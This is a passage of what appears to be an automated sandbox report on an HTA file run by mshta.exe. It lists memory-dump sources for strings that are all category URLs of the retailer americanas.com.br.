Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/tablet
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/tablet-e-ipad/tablet?chave=pfm_hm_tt_1_0_tablet
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747475403.000000000C12A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_hm_tt_1_0_informatica
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_home_informatica_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/instrumentos-musicais?chave=pfm_home_instrumentos_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=dk_hm_at_livros
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=dk_hm_at_livros3
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769621202.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727460305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747509040.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=pfm_home_livros_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menu
Source: mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menuUp
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/malas7kNO
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/alimentos?chave=pc_cat_menu_mercearia_mercado
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/alimentos?chave=pc_cat_menu_mercearia_mercado8
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/alimentos?chave=pc_cat_menu_mercearia_mercadoF
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebes?chave=pc_cat_menu_bebes_mercado
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas/vinho
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas?chave=pc_cat_menu_bebidas
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-nao-alcoolicas?chave=pc_cat_menu_beb
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776074552.000000000C0BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2663684989.00000000093D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, 